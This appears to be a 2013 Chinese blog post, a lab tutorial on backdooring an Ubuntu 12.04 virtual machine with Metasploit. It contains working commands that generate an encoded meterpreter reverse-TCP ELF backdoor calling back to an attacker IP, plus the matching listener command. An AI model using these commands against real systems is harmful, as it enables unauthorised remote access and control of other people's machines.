注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

Linux 折腾笔记

 
 
 
 
 

日志

 
 

Metasploit使用后门渗透Ubuntu12.04  

2013-11-25 15:29:32|  分类: Metasploit |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
Metasploit使用后门渗透Ubuntu12.04 - xiao106347 - Linux 折腾笔记
 

目标主机ubuntu12.04 x86 虚拟机(192.168.0.131)
本地主机:192.168.0.149

1.生成后门程序:
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.149 LPORT=4444 R| msfencode -t elf -e x86/shikata_ga_nai >> /root/Desktop/test

2.开始监听:
msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.149 LPORT=4444 E

Metasploit使用后门渗透Ubuntu12.04 - xiao106347 - 学习笔记
 

 将后门程序拷贝到目标主机,改变权限,并执行:
Metasploit使用后门渗透Ubuntu12.04 - xiao106347 - 学习笔记
 
尝试在本地主机切换到root账户,就算输入密码也是切换不了;当本地主机执行切换到root用户的命令后,目标主机也会提示要输入root密码,只有在目标主机输入密码才能在本地主机切换到root!
Metasploit使用后门渗透Ubuntu12.04 - xiao106347 - 学习笔记
 
当目标主机输入root密码之后,本地主机开始切换到root账户:
Metasploit使用后门渗透Ubuntu12.04 - xiao106347 - 学习笔记
 
如果在目标主机以root账户运行后门程序呢?。。。。。
Metasploit使用后门渗透Ubuntu12.04 - xiao106347 - 学习笔记
 
  评论这张
 
阅读(3769)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016